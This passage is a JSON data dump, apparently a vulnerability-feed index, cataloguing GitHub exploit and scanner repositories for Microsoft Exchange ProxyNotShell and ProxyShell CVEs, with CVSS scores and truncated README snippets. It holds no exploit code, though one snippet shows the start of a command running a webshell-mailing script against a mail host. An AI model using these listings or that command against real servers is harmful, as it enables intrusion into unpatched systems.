"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T08:18:55", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-06T08:27:11", "id": "17DBAF5D-D221-53A1-8663-721B510E680E", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T20:03:01", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {}, "published": "2022-09-30T18:25:21", "type": "githubexploit", "title": "Exploit for CVE-2022-41040", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-09-30T19:54:22", "id": "58C7CDFB-F328-57B4-ACE6-CA3966DB0EEB", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-01-09T08:13:21", "description": "# CVE-2022-41082-POC\nPoC for the CVE-2022-41082 NotProxyShell OW...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T09:35:26", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2023-01-09T07:01:20", "id": "611C3255-B1A5-56E6-8D1D-FCC2CE570C29", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T20:02:18", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", 
"cvss3": {}, "published": "2022-09-30T19:07:36", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T19:59:34", "id": "9905FF79-0EE2-5313-9486-DA71B70A3D88", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-04T08:05:17", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T03:59:27", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-04T06:50:06", "id": "2DFE744C-4369-56D5-9FEA-348B4150C298", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-06T11:07:53", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T08:22:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-06T08:26:55", "id": 
"0AA01487-E0E5-59CB-9A45-A5DE55F290A6", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T11:04:07", "description": "# CVE-2022-41082 RCE a.k.a ProxyNotShell \r\n\r\n## Attention!\r\n\r\nTh...", "cvss3": {}, "published": "2022-09-30T09:33:39", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T09:38:02", "id": "BC7AA745-CDB6-554E-B6CC-A50E97B7ECE5", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-02T02:06:53", "description": "# CVE-2022-41082-POC\nPoC for CVE-2022-41082 RCE a.k.a ProxyNotSh...", "cvss3": {}, "published": "2022-10-01T05:30:48", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-01T11:42:51", "id": "0E54CE3B-3E70-59B7-BB6B-AC20C8611B38", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T20:03:05", "description": "# CVE-2022-41082-PoC\nCVE-2022-41082 is a SSRF vulnerability whic...", "cvss3": {}, "published": "2022-09-30T17:23:29", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T17:29:46", "id": "E4395A48-164E-527F-8B5B-1A44D3F379B6", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-01-09T08:12:38", "description": "# CVE-2022-41082-POC\nPoC for the CVE-2022-41082 NotProxyShell OW...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T09:35:26", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2023-01-09T07:01:20", "id": "DF35E634-51B1-5A30-AB0B-8518E3754609", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T20:04:16", "description": "# CVE-2022-41082-RCE\nCVE-2022-41082 is a SSRF vulnerability whic...", "cvss3": {}, "published": "2022-09-30T12:48:08", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T19:04:38", "id": "04705DD0-6F67-5847-B368-4ADB734EC12B", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-04T19:38:53", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-04T17:32:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-04T17:42:32", "id": "031A1BA5-EA1C-586D-8614-7558CCA5FCCB", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T23:02:09", "description": "# CVE-2022-41082-POC\nPoC for CVE-2022-41082 RCE as known as Prox...", "cvss3": {}, "published": "2022-09-30T17:51:47", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", 
"cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T21:02:14", "id": "6064317C-299E-530F-81F1-F80C282AE68A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:28", "description": "# CVE-2021-34473-scanner\nScanner for CVE-2021-34473, ProxyShell,...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T12:20:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-12-22T09:48:36", "id": "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-10T07:09:52", "description": "# CVE-2021-34473\nCVE-2021-34473 Microsoft Exchange Server Remote...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T11:27:13", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2022-08-10T06:53:56", "id": "4AC49DB9-A784-561B-BF92-94209310B51B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-11T21:36:34", "description": "# CVE-2022-41040\nCode set relating to CVE-2022-41040.\n\nscanner.p...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T01:20:32", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-09T14:24:07", "id": "D52F3F41-2E8A-5FC2-AA35-BC6707158F1A", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:43:05", "description": "UPDATED VERSION ALLOWS FOR HTTPS CHECK AS WELL \n\n# exchange-vuln...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-14T08:31:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2023-02-17T00:50:04", "id": "32D96718-99E1-55BD-86E8-30A9B59E40D1", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:26:27", "description": "# CVE-2022-41040-POC\nCVE-2022-41040 - Server Side Request Forger...", "cvss3": 
{"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-09T15:27:40", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2023-09-16T21:57:19", "id": "62D6E584-1E80-5592-B12B-068A448438E2", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-08T08:21:02", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T07:50:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], 
"modified": "2022-10-08T07:53:18", "id": "B8464218-31FA-569A-AC74-26B347DEC285", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T23:03:10", "description": "# -CVE-2022-41082-RCE\nPoC for CVE-2022-41082 RCE as known as Pro...", "cvss3": {}, "published": "2022-09-30T20:59:46", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T21:01:47", "id": "6E208382-5651-5649-B6C1-F9EF3A08EA81", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-03T08:01:45", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T05:05:11", "type": "githubexploit", "title": "Exploit for CVE-2022-41040", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-03T05:12:11", "id": "D58D53CD-D047-5570-B473-DEFF8E3B0225", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-08-11T21:33:34", "description": "# CVE-2022-41040\n# Microsoft Exchange vulnerable to server-side ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 
"NONE"}, "impactScore": 5.9}, "published": "2022-10-14T17:01:17", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2023-03-23T04:20:35", "id": "3722FF3F-D30D-5D5C-802E-EEA4963C6848", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:33:27", "description": "- python send_webshell_mail.py https://mail16.echod.com aaa@echo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T07:47:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2023-09-16T21:49:11", "id": "0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:18:33", "description": "# CVE-2021-34473-NMAP-SCANNER\nA massive scanner for CVE-2021-344...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-16T08:22:29", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2023-05-06T05:33:04", "id": "2BEFA353-947D-5B41-AE38-EDB0C71B5B44", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:43:07", "description": "# ProxyShell_POC\nPOC for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T07:29:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34523", "CVE-2021-31207", "CVE-2021-34473"], "modified": "2022-03-12T13:42:54", "id": "E458F533-4B97-51A1-897B-1AF58218F2BF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:31:20", "description": "# Proxyshell-Scanner\nnuclei scanner for Proxyshell RCE (CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T15:01:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34423"], "modified": "2022-03-02T12:56:33", "id": "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:01:02", "description": "# ProxyShell\nProof of Concept Exploit for Microsoft Exchange CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T15:34:03", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-23T18:03:46", "id": "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, 
{"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, 